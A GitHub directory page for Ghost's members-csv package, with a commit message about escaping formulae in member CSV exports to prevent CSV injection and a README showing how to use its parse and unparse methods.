0
Fork 0
mirror of https://github.com/TryGhost/Ghost.git synced 2025-01-06 22:40:14 -05:00
ghost/ghost/members-csv
Daniel Lockyer de668e7950 🔒 Added escaping to member export CSV fields
fix https://linear.app/tryghost/issue/ENG-805/
refs https://owasp.org/www-community/attacks/CSV_Injection

- it's possible for certain fields in a member CSV export to be executed
  by software that opens the CSVs
- we can protect against this for the user by escaping any forumulae in
  the CSV fields
- papaparse provides this option natively, so it's just a case of
  providing the field to the unparse method
- credits to Harvey Spec (phulelouch) for reporting
2024-04-03 10:21:02 +02:00
..
lib 🔒 Added escaping to member export CSV fields 2024-04-03 10:21:02 +02:00
test 🔒 Added escaping to member export CSV fields 2024-04-03 10:21:02 +02:00
.eslintrc.js
index.js
package.json Update dependency fs-extra to v11.2.0 2023-11-28 11:54:44 +01:00
README.md Fixed typos (#18648) 2023-10-31 15:21:44 +00:00

Members Csv

Usage

There are 2 parts to this package: CSV to JSON serialization and JSON to CSV serialization. The module exposes 2 methods to fulfil these: parse and unparse respectively.

To parse CSV file and convert it to JSON use parse method, e.g.:

const {parse} = require('@tryghost/members-csv');

const mapping = {
    email: 'csv_column_containing_email_data',
    name: 'csv_column_containing_names_data'
}
const membersJSON = await parse(csvFilePath, mapping);

csvFilePath - is a path to the CSV file that has to be processed mapping - optional parameter, it's a hash describing custom mapping for CSV columns to JSON properties

Example mapping for CSV having email under correo_electronico column would look like following:

{
    email: 'correo_electronico'
}

To unparse JSON to CSV compatible with members format use following:

const {unparse} = require('@tryghost/members-csv');

const members = [{
    email: 'email@example.com',
    name: 'Sam Memberino',
    note: 'Early supporter'
}];

const membersCSV = unparse(members);

console.log(membersCSV);
// -> "id,email,name,note,subscribed_to_emails,complimentary_plan,stripe_customer_id,created_at,deleted_at,labels\r\n,email@example.com,Sam Memberino,Early supporter,,,,,,"